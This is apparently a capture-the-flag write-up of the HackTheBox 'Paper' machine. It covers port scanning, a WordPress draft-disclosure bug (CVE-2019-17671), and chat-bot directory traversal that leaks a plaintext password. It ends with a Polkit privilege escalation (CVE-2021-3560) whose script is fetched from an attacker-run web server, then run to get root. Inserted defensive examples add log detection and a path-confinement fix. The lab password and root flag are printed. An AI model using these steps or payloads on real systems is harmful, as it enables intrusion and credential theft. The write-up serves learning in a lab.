Paper-htb-writeup

0x00 Lab Skills Overview

Skills covered: HTTP packet analysis, CVE-2019-17671 exploitation, hubot directory traversal and file read, hubot configuration file disclosure, CVE-2021-3560 exploitation

Reference: https://0xdf.gitlab.io/2022/06/18/htb-paper.html

Reference: https://sidthoviti.com/paper-hackthebox-writeup/

0x01 Obtaining User Access

1. Get the target machine's IP address: 10.10.11.143

2. Scan for open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.143
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 09:59 CST
Nmap scan report for 10.10.11.143
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 8.72 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,443,
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,443 -Pn --min-rate=10000 10.10.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:05 CST
Nmap scan report for 10.10.11.143
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.94 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -sU --min-rate=10000 -oG allports 10.10.11.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:10 CST
Warning: 10.10.11.143 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.143
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.11.143 are in ignored states.
Not shown: 65456 open|filtered udp ports (no-response), 79 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 74.62 seconds

3. Scan for directories

┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.11.143/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.11.143/__23-12-28_10-14-06.txt

Target: http://10.10.11.143/

[10:14:06] Starting:
[10:14:26] 403 - 199B - /.ht_wsr.txt
[10:14:26] 403 - 199B - /.htaccess.bak1
[10:14:26] 403 - 199B - /.htaccess.orig
[10:14:26] 403 - 199B - /.htaccess.sample
[10:14:26] 403 - 199B - /.htaccess.save
[10:14:26] 403 - 199B - /.htaccess_extra
[10:14:26] 403 - 199B - /.htaccess_orig
[10:14:26] 403 - 199B - /.htaccessOLD
[10:14:26] 403 - 199B - /.htaccessBAK
[10:14:26] 403 - 199B - /.htaccess_sc
[10:14:26] 403 - 199B - /.htaccessOLD2
[10:14:26] 403 - 199B - /.htm
[10:14:26] 403 - 199B - /.html
[10:14:26] 403 - 199B - /.htpasswd_test
[10:14:26] 403 - 199B - /.httr-oauth
[10:14:26] 403 - 199B - /.htpasswds
[10:14:29] 403 - 199B - /.npm/
[10:14:29] 301 - 233B - /.npm -> http://10.10.11.143/.npm/
[10:14:29] 200 - 171B - /.npm/anonymous-cli-metrics.json
[10:14:34] 403 - 199B - /.user.ini
[10:15:14] 403 - 199B - /cgi-bin/
[10:15:17] 404 - 16B - /composer.phar
[10:15:39] 404 - 16B - /index.php/login/
[10:15:48] 301 - 235B - /manual -> http://10.10.11.143/manual/
[10:15:48] 200 - 9KB - /manual/index.html
[10:15:59] 404 - 16B - /php-cs-fixer.phar
[10:15:59] 403 - 199B - /php5.fcgi
[10:16:03] 404 - 16B - /phpunit.phar

Task Completed

4. View the site's home page

5. Check what is under the http://10.10.11.143/manual/ directory

6. After more digging, we found a new domain name in the HTTP packets

office.paper

7. Map the domain to the target IP in our local hosts file

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.143 office.paper" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.143 office.paper

8. View the site's home page

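9. Here I actually tried directory scanning, a wpscan scan, and password brute forcing, but got nothing interesting; at most the version of the site's framework.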

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-04).   

10. I went back and kept re-reading the site's content, and found some hints

11. Using the version information obtained earlier, I searched for vulnerabilities and found an unauthorized access vulnerability

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit wordpress 5.2.3
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi | php/webapps/51042.txt
WordPress Core 5.2.3 - Cross-Site Host Modification | php/webapps/47361.pl
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/webapps/47690.md
Exploit: WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
URL: https://www.exploit-db.com/exploits/47690
Path: /usr/share/exploitdb/exploits/multiple/webapps/47690.md
Codes: CVE-2019-17671
Verified: False
File Type: ASCII text
Copied to: /home/kali/桌面/47690.md

┌──(kali㉿kali)-[~/桌面]
└─$ cat 47690.md
So far we know that adding `?static=1` to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format


In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
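
The parameters listed in 47690.md above are visible in web server access logs, so the same description doubles as a detection rule. The following is an added example, not part of the original write-up or of the exploit-db entry: it scans Apache combined-format log lines for requests carrying the `static` query parameter and records which of the modifiers (`order`, `orderby`, `m`) came with it. The function names and the log lines are constructed for illustration.

```javascript
// Added example: flag requests that carry the `static` query parameter
// described in 47690.md (CVE-2019-17671). All log lines are constructed.
const MODIFIERS = ['order', 'orderby', 'm']; // listed in 47690.md

// Parse one Apache combined-log line; returns null when it does not match.
function parseLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Return one finding per request whose query string contains `static`.
// URLSearchParams percent-decodes names, so `%73tatic=1` is caught too.
function findStaticProbes(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    let url;
    try {
      url = new URL(rec.target, 'http://log.invalid'); // base only for parsing
    } catch (err) {
      continue; // unparsable request target
    }
    if (!url.searchParams.has('static')) continue;
    hits.push({
      ip: rec.ip,
      time: rec.time,
      path: url.pathname,
      status: rec.status,
      modifiers: MODIFIERS.filter((p) => url.searchParams.has(p)),
    });
  }
  return hits;
}

// Constructed sample input (documentation addresses, not from the page).
const SAMPLE_LOG = [
  '192.0.2.10 - - [28/Dec/2023:10:41:02 +0800] "GET / HTTP/1.1" 200 23701 "-" "Mozilla/5.0"',
  '192.0.2.10 - - [28/Dec/2023:10:41:09 +0800] "GET /?static=1 HTTP/1.1" 200 9412 "-" "Mozilla/5.0"',
  '192.0.2.10 - - [28/Dec/2023:10:41:15 +0800] "GET /?static=1&order=asc HTTP/1.1" 200 9733 "-" "curl/8.4.0"',
  '198.51.100.7 - - [28/Dec/2023:10:42:00 +0800] "GET /?%73tatic=1&m=2021 HTTP/1.1" 200 8120 "-" "curl/8.4.0"',
  '198.51.100.7 - - [28/Dec/2023:10:42:31 +0800] "GET /wp-content/static/app.js?ver=5.2.3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

for (const h of findStaticProbes(SAMPLE_LOG)) {
  console.log(`${h.time} ${h.ip} ${h.path} status=${h.status} modifiers=${h.modifiers.join(',') || '-'}`);
}
```

A hit is a lead to review rather than proof of disclosure; the durable fix is upgrading WordPress past the affected version.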

12. Using this vulnerability I found some interesting information

# Secret Registration URL of new Employee chat system

http://chat.office.paper/register/8qozr226AhkCHZdyY

# I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.

13. Add this hostname to the hosts file as well, then visit the address above

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.11.143 chat.office.paper" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.143 chat.office.paper

14. It is a registration page, so we register an account

test
test@qq.com
test123
test123

15. After logging in and reading the chat, I found some interesting information

Receptionitis15 Just call the bot by his name and say help. His name is recyclops.
For eg: sending "recyclops help" will spawn the bot and he'll tell you what you can and cannot ask him.
Now stop wasting my time PAM! I've got work to do!

kellylikescupcakes Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.
Most frequently asked questions include:
- What time is it?
- What new files are in your sales directory?
- Why did the salesman crossed the road?
- What's the content of file x in your sales directory? etc.
Please note that I am a beta version and I still have some bugs to be fixed.
How to use me ? :
1. Small Talk:
You can ask me how dwight's weekend was, or did he watched the game last night etc.
eg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?
2. Joke:
You can ask me Why the salesman crossed the road.
eg: 'recyclops why did the salesman crossed the road?'
<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>
For security reasons, the access is limited to the Sales folder.
3. Files:
eg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'
4. List:
You can ask me to list the files
5. Time:
You can ask me to what the time is
eg: 'recyclops what time is it?' or just 'recyclops time'

16. Here I found two commonly used commands

recyclops file test.txt

recyclops list sale

17. While gathering information, I found that directory traversal gives access to other directories

recyclops file test.txt

recyclops list sale

2:17 PM
recyclops list ../../
Bot
2:17 PM
Fetching the directory listing of ../../
total 0
drwxr-xr-x. 3 root root 20 Jan 14 2022 .
dr-xr-xr-x. 17 root root 244 Jan 17 2022 ..
drwx------ 11 dwight dwight 281 Feb 6 2022 dwight
2:18 PM
recyclops list ../
Bot
2:18 PM
Fetching the directory listing of ../
total 32
drwx------ 11 dwight dwight 281 Feb 6 2022 .
drwxr-xr-x. 3 root root 20 Jan 14 2022 ..
lrwxrwxrwx 1 dwight dwight 9 Jul 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 dwight dwight 18 May 10 2019 .bash_logout
-rw-r--r-- 1 dwight dwight 141 May 10 2019 .bash_profile
-rw-r--r-- 1 dwight dwight 358 Jul 3 2021 .bashrc
-rwxr-xr-x 1 dwight dwight 1174 Sep 16 2021 bot_restart.sh
drwx------ 5 dwight dwight 56 Jul 3 2021 .config
-rw------- 1 dwight dwight 16 Jul 3 2021 .esd_auth
drwx------ 2 dwight dwight 44 Jul 3 2021 .gnupg
drwx------ 8 dwight dwight 4096 Sep 16 2021 hubot
-rw-rw-r-- 1 dwight dwight 18 Sep 16 2021 .hubot_history
drwx------ 3 dwight dwight 19 Jul 3 2021 .local
drwxr-xr-x 4 dwight dwight 39 Jul 3 2021 .mozilla
drwxrwxr-x 5 dwight dwight 83 Jul 3 2021 .npm
drwxr-xr-x 4 dwight dwight 32 Jul 3 2021 sales
drwx------ 2 dwight dwight 6 Sep 16 2021 .ssh
-r-------- 1 dwight dwight 33 Dec 27 20:49 user.txt
drwxr-xr-x 2 dwight dwight 24 Sep 16 2021 .vim
2:19 PM
recyclops list ../hubot
Bot
2:19 PM
Fetching the directory listing of ../hubot
total 308
drwx------ 8 dwight dwight 4096 Sep 16 2021 .
drwx------ 11 dwight dwight 281 Feb 6 2022 ..
-rw-r--r-- 1 dwight dwight 0 Jul 3 2021 \
srwxr-xr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8000
srwxrwxr-x 1 dwight dwight 0 Jul 3 2021 127.0.0.1:8080
drwx--x--x 2 dwight dwight 36 Sep 16 2021 bin
-rw-r--r-- 1 dwight dwight 258 Sep 16 2021 .env
-rwxr-xr-x 1 dwight dwight 2 Jul 3 2021 external-scripts.json
drwx------ 8 dwight dwight 163 Jul 3 2021 .git
-rw-r--r-- 1 dwight dwight 917 Jul 3 2021 .gitignore
-rw-r--r-- 1 dwight dwight 174792 Dec 28 01:19 .hubot.log
-rwxr-xr-x 1 dwight dwight 1068 Jul 3 2021 LICENSE
drwxr-xr-x 89 dwight dwight 4096 Jul 3 2021 node_modules
drwx--x--x 115 dwight dwight 4096 Jul 3 2021 node_modules_bak
-rwxr-xr-x 1 dwight dwight 1062 Sep 16 2021 package.json
-rwxr-xr-x 1 dwight dwight 972 Sep 16 2021 package.json.bak
-rwxr-xr-x 1 dwight dwight 30382 Jul 3 2021 package-lock.json
-rwxr-xr-x 1 dwight dwight 14 Jul 3 2021 Procfile
-rwxr-xr-x 1 dwight dwight 5044 Jul 3 2021 README.md
drwx--x--x 2 dwight dwight 193 Jan 13 2022 scripts
-rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 start_bot.sh
drwx------ 2 dwight dwight 25 Jul 3 2021 .vscode
-rwxr-xr-x 1 dwight dwight 29951 Jul 3 2021 yarn.lock
2:21 PM
recyclops file ../hubot/start_bot.sh
Bot
2:21 PM
<!=====Contents of file ../hubot/start_bot.sh=====>
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
<!=====End of file ../hubot/start_bot.sh=====>
2:21 PM
recyclops file ../hubot/.env
Bot
2:21 PM
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>
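
The bot's help text says access is limited to the Sales folder, yet the transcript above shows `../` and `../hubot/.env` being served. The following is an added example, not the bot's own code (which this write-up does not show): it contrasts a naive join with a resolver that rejects any request landing outside the base directory. `SALES_DIR` and all function names are hypothetical.

```javascript
// Added example: confining a user-supplied file name to one base directory.
// SALES_DIR and the function names are hypothetical, not the bot's code.
const path = require('path').posix; // the host in the listing is Linux

const SALES_DIR = '/home/dwight/sales';

// Naive: join the requested name onto the base. "../" climbs out of it.
function naiveResolve(baseDir, requested) {
  return path.join(baseDir, requested);
}

// Confined: resolve first, then require the result to stay under baseDir.
// Comparing with path.relative avoids the prefix trap where
// "/home/dwight/sales_old" passes a startsWith("/home/dwight/sales") test.
function confinedResolve(baseDir, requested) {
  if (typeof requested !== 'string' || requested.includes('\0')) {
    throw new Error('invalid path');
  }
  const base = path.resolve(baseDir);
  const target = path.resolve(base, requested);
  const rel = path.relative(base, target);
  if (rel === '..' || rel.startsWith('../') || path.isAbsolute(rel)) {
    throw new Error('path escapes base directory');
  }
  return target; // lexical check only; symlinks need a realpath step
}

// Report how each request would be handled by both resolvers.
function compare(requested) {
  const naive = naiveResolve(SALES_DIR, requested);
  try {
    return { requested, naive, confined: confinedResolve(SALES_DIR, requested) };
  } catch (err) {
    return { requested, naive, confined: 'REJECTED: ' + err.message };
  }
}

// Requests taken from the bot's help text and the transcript above, plus
// one constructed sibling-directory case.
const REQUESTS = ['test.txt', 'src/test.php', '../', '../hubot/.env', '../sales_old/x.txt'];
for (const r of REQUESTS) console.log(compare(r));
```

The check is purely lexical, so a symlink inside the base directory can still point elsewhere; resolving both paths with `fs.realpathSync` before comparing closes that gap. Keeping credentials such as the `.env` file out of any tree a chat-facing process can read limits the damage if the check is ever bypassed.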

18. Combining the dwight user seen earlier on the WordPress site with this password, we successfully logged in to the system

dwight
Queenofblad3s!23

That gave us the user flag; I forgot to record it here...

0x02 Obtaining System Privileges

19. I tried sudo -l here, but it returned nothing useful

[dwight@paper ~]$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for dwight:
Sorry, user dwight may not run sudo on paper.
[dwight@paper ~]$

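20. Here I used the linpeas.sh script to enumerate privilege-escalation vulnerabilities, but ran into a problem: because the script I downloaded was the latest version, it did not flag CVE-2021-3560 as it should have, and I was stuck here for a long time. After that, I followed a walkthrough for the rest of the privilege escalation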

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

wget https://raw.githubusercontent.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation/main/poc.sh
python -m http.server
wget http://10.10.16.22:8000/poc.sh
vi poc.sh #Change the username and password or use default.
chmod +x poc.sh
./poc.sh
su - sid
sudo bash

21. Start a web server so the exploit file can be downloaded remotely

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.143 - - [28/Dec/2023 15:02:45] "GET /poc.sh HTTP/1.1" 200 -

[dwight@paper ~]$ ls
bot_restart.sh hubot linpeas.sh sales user.txt
[dwight@paper ~]$ wget http://10.10.14.3/poc.sh
--2023-12-28 02:02:44-- http://10.10.14.3/poc.sh
Connecting to 10.10.14.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9627 (9.4K) [text/x-sh]
Saving to: 'poc.sh'

poc.sh 100%[===========================>] 9.40K --.-KB/s in 0s

2023-12-28 02:02:45 (106 MB/s) - 'poc.sh' saved [9627/9627]

22. Run the exploit to escalate privileges and obtain the final flag

[dwight@paper ~]$ vim ./poc.sh 
[dwight@paper ~]$ chmod +x poc.sh
[dwight@paper ~]$ ./poc.sh

[!] Username set as : shiyan
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username shiyan...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
id: 'shiyan': no such user
[x] Insertion of Username failed!
[!] Aborting Execution!
[!] Usually multiple attempts are required to get the timing right. Try running the exploit again.
[!] If the exploit doesn't work after several tries, then you may have to exploit this manually.
[dwight@paper ~]$ ./poc.sh

[!] Username set as : shiyan
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username shiyan...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username shiyan with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - shiyan
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - sid
su: user sid does not exist
[dwight@paper ~]$ su shiyan
Password:
[shiyan@paper dwight]$ id
uid=1005(shiyan) gid=1005(shiyan) groups=1005(shiyan),10(wheel)
[shiyan@paper dwight]$ sudo bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for shiyan:
[root@paper dwight]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper dwight]# cat /root/root.txt
135686c445f7f323d89ed243189f1d00
[root@paper dwight]#

0x03 Proof of Completion

https://www.hackthebox.com/achievement/machine/1705469/432


Paper-htb-writeup
https://sh1yan.top/2023/12/28/Paper-htb-writeup/
Author: shiyan
Published: December 28, 2023